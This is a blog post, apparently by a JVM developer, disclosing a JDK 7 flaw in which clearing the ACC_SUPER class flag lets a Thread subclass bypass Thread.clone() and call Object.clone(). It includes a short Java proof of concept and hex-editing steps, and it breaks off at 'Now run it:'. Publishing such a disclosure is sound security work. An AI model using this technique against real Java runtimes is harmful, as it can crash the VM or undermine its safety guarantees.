JDK 7 Thread Cloning Vulnerability

This blog entry was originally posted on June 23, 2011, but was deleted as Oracle asked me to take it down while they investigate. After more than a year, the issue still has not been addressed, so I notified Oracle that I wanted to repost the blog entry and received no response. -- Jeroen

I warned on the mailing list when this came up, but apparently was ignored,so maybe a blog post will help.

In one of last year's updates of JDK 6 the cloning vulnerability was fixed in a hackish, but clever and safe way. Now in JDK 7 they try to fix it by overriding Object.clone() with a version that simply throws CloneNotSupportedException. The only problem is, in Java (and .NET too) overriding a method is not a safe way to make the base class method unavailable.

The (still) not so well known ACC_SUPER flag allows you (when it isn't set) to call arbitrary (accessible) methods in your super class hierarchy. So Thread.clone() can be skipped and Object.clone() can be called from any Thread subclass that doesn't have the ACC_SUPER flag set.

Here's an example:

class Clone extends Thread implements Cloneable {

public Object clone() {

try { return super.clone(); }

catch (CloneNotSupportedException _) { throw new Error(); }

}

}

class Demo {

public static void main(String[] args) throws Throwable {

Clone c1 = new Clone() {

public void run() {

for (;;) {

}

}

};

c1.start();

Thread t = (Thread)c1.clone();

c1.stop();

c1.join();

System.gc();

t.stop();

}

}

Note that after you compile this with JDK 6 you'll need to edit the Clone.class to clear the ACC_SUPER flag. Use a hex editor to replace 20 (hex) with 00 or download a copy here.

Now run it: